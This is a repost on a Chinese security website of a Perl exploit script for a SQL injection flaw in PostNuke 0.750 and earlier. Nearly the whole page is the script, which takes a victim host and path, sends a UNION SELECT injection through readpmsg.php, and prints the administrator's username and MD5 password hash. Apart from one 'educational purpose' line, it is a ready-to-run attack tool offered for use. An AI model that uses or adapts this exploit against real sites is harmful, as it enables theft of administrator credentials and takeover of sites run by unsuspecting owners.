首页 网络安全 安全学院 查看内容

PostNuke <= 0.750 readpmsg.php SQL Injection Exploit

2005-6-8 03:44 719 0

摘要: Added by: SecureBit Date: 06.06.05 Time: 19:49:47 Category: Exploits Source: http://h4cky0u.tk/ #!...
关键词: Injection print Socket host nbsp ARGV pn 20 Usage PostNuke

Added by: SecureBit Date: 06.06.05 Time: 19:49:47 Category: Exploits Source: http://h4cky0u.tk/ #!/usr/bin/perl# This tools is only for educational purpose## Author: K-C0d3r a x0n3-h4ck friend !!! ## This exploit should give admin nick and md5 password##-=[ PostNuke SQL Injection version : x=> 0.750]=-#-=[ ]=-#-=[ Discovered by sp3x ]=-#-=[ Coded by K-C0d3r ]=-   use IO::Socket; sub Usage {print STDERR \"Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\\n\";exit;} if (@ARGV < 2){Usage();} if (@ARGV > 2){Usage();} if (@ARGV == 2){$host = @ARGV[0];$path = @ARGV[1]; print \"[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\\n\";print \"[+] Connecting to $host\\n\"; $injection = \"$host\\/$path?\";$injection .= \"op=modload&name=Messages&file=readpmsg&start=0\";$injection .= \"%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null\";$injection .= \"%20FROM%20pn_users%20WHERE%20pn_uid=2\\/*&total_messages=1\"; $socket = new IO::Socket::INET (PeerAddr => \"$host\",PeerPort => 80,Proto => \'tcp\');die unless $socket; print \"[+] Injecting command ...\\n\";print $socket \"GET http://$injection HTTP/1.1\\nHost: $host\\n\\n\";while (<$socket>){print $_;exit;}}      
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部